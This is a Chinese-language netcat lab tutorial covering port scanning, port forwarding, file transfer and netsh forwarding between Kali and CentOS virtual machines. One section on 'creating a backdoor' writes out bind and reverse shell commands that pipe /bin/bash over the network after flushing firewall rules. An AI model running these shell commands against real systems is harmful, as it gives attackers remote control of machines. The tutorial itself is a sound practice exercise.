我安装了kali、centos,并且kali上安装了ncat
Kali上:apt install ncat
Centos上:yum -y install nmap-ncat
一.传统版与现代版切换
命令:update-alternatives --config nc
/bin/nc.traditional 为传统netcat
二.监听入站连接
步骤一:建立一个命令文件
代码复制到web.sh文件中:
#!/bin/bash
while true;do nc -l -p 8080 -q 1 < index.html;done
exit 0
建立一个文件index.html,里面随便写内容
步骤二:运行web.sh文件
步骤三:本地浏览器访问8080端口
三.连接远程系统
在上面二的基础上
我用centos7去连接kali
四.端口扫描
步骤一:首先update-alternatives --config nc切换到传统版本
步骤二:netstat -tpln 查看本机启动了哪些端口
步骤三:开始扫描nc -v -w 2 -z 192.168.80.132 22-65535
-v:显示详细
-w:超时2s跳过
-z:主机地址
五.端口转发
步骤一:在centos7上启动apache,并查看端口,为80端口
步骤二:在kali上输入命令nc -c "nc 192.168.80.131 80" -l -p 8181
意思为:创建8181端口来监听(注意kaili8181端口不存在),
并将发往kali8181端口的数据给到centos7的80端口。
步骤三:在浏览器,输入kali的ip:8181端口,访问到了centos7启动的apache
六.创建后门
正向连接:
centos7(服务端,公网机器)
步骤1:
Iptables -F (关闭防火墙策略)
nc -l -p 10000 -t -e /bin/bash
kali(客户端)
步骤2:nc 192.168.80.131 10000
步骤3:输入uname -v 就可以查看centos7的版本信息,同样可以玩其它命令
反向连接:
Kali(客户端)
步骤1:nc -lvp 4444
-l:监听
-v:显示详情
-p:端口
centos7(服务端)
步骤2:nc -t -e /bin/bash 192.168.80.132 4444
步骤3:在kali上操作,输入uname -a 就可以查看centos7版本信息,同样可以玩其它命令
七.拷贝文件
步骤一:在centos7 上建立监听端口,并将接收到的信息保存到file.txt文件
nc -l -p 6666 > file.txt
步骤二:在kali上连接centos7建立的端口,并发送index.html文件
步骤三:在centos7上查看file.txt内容
八.frp内网穿透(不易掉线、加密、专业)
九.Windows下netsh端口转发
步骤一:以管理员模式打开cmd窗口
步骤二:建立转发命令:netsh interface portproxy add v4tov4 listenport=8081 connectaddress=192.168.80.131 connectport=80(本地建立监听端口8081,192.168.80.131为centos7ip,80为centos7的apache端口)
步骤三:浏览器访问
